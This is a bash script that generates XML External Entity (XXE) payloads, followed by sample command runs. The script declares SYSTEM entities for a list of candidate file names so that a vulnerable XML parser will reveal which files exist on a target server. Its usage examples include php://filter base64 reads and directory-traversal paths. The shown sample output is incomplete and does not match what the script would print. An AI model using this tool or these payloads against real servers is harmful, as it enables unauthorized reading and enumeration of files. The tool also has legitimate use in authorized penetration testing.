Script for brute forcing file names via XML DTD Entities
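#!/bin/bash
# Script for brute forcing file names via XML DTD entities.
#
# Emits an XML document whose DOCTYPE declares one external (SYSTEM) entity
# per candidate file name, plus a "file_list" entity that references all of
# them, followed by a <files> element that expands "file_list".
#
# Usage: xxe_filebrute.sh <'single_quoted_path_base'> <file_names_list>
#   path_base        URI prefix placed in front of every name (may be '')
#   file_names_list  text file holding one candidate file name per line
#
# Output:  the generated document on stdout; diagnostics on stderr.
# Returns: 0 on success, 1 on bad usage, missing list file, or empty list.
#
# The declared URIs are only fetched by an XML parser that processes DTDs and
# resolves external entities; a parser with DOCTYPE declarations or external
# entity resolution disabled does not dereference any of them.
#
# NOTE: the path base and file names are written into the entity declarations
# verbatim (no XML escaping). A double quote in either one ends the system
# literal early and yields a malformed declaration.

set -euo pipefail

readonly CONCAT_HEAD='<!ENTITY file_list "'
readonly CONCAT_TAIL='" >'

# CONFIRM CLI ARGUMENT COUNT
# Checked before $1/$2 are read so that `set -u` cannot trip on a missing
# argument; usage errors exit non-zero so callers can detect them.
if [[ $# -ne 2 ]]; then
  cat >&2 <<EOF

USAGE: $0 <'single_quoted_path_base'> <file_names_list>

USAGE EXAMPLE: $0 'file:///c:/inetpub/wwwroot/' file_names.txt
PATH EXAMPLES: PHP Filters - 'php://filter/convert.base64-encode/resource='
 Fingerprint PHP open_basedir - 'php://filter/convert.base64-encode/resource=../../../../../../../../../'
 File Stream - 'file:///'
 Empty Base - ''

EOF
  exit 1
fi

PATH_BASE=$1
FILE_LIST=$2

# CONVERT BACKSLASHES IN THE PATH BASE TO FORWARD SLASHES
# Done with parameter expansion instead of an unquoted `echo | tr`, which
# word-split and glob-expanded the value before converting it.
PATH_BASE=${PATH_BASE//\\//}

# CONFIRM FILE_LIST IS PRESENT
if [[ ! -f "$FILE_LIST" ]]; then
  printf 'ERROR: File (%s) not found!\n' "$FILE_LIST" >&2
  exit 1
fi

declare -a FILE_NAMES=()
readarray -t FILE_NAMES < "$FILE_LIST"

# An empty list would produce a DOCTYPE with no SYSTEM entities at all.
if (( ${#FILE_NAMES[@]} == 0 )); then
  printf 'ERROR: File (%s) contains no file names!\n' "$FILE_LIST" >&2
  exit 1
fi

# PRINT DOCTYPE HEADER
printf '%s\n' '<!DOCTYPE file_brute ['

# OUTPUT ENTITY LIST
# Each name becomes entity file_<n>; the references are collected so that
# "file_list" can expand to every declared entity in order.
i=1
CONCAT_ENT=""
for FILE in "${FILE_NAMES[@]}"; do
  ENT_NAME="file_$i"
  # Quoted arguments keep names containing spaces or glob characters intact.
  printf '<!ENTITY %s SYSTEM "%s%s" >\n' "$ENT_NAME" "$PATH_BASE" "$FILE"
  CONCAT_ENT+="&${ENT_NAME};"
  i=$((i + 1))
done

# PRINT CONCATENATED ENTITY LIST
printf '%s%s%s' "$CONCAT_HEAD" "$CONCAT_ENT" "$CONCAT_TAIL"

# PRINT DOCTYPE TAIL
printf '\n]>\n\n'
printf '%s\n' '<files>&file_list;</files>'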
$ ./xxe_filebrute.sh
USAGE: ./xxe_filebrute.sh <'single_quoted_path_base'> <file_names_list>
USAGE EXAMPLE: ./xxe_filebrute.sh 'file:///c:/inetpub/wwwroot/' file_names.txt
PATH EXAMPLES: PHP Filters - 'php://filter/convert.base64-encode/resource='
Fingerprint PHP open_basedir - 'php://filter/convert.base64-encode/resource=../../../../../../../../../'
File Stream - 'file:///'
Empty Base - ''
$ ./xxe_filebrute.sh '' filelist.txt
]>
&file_list;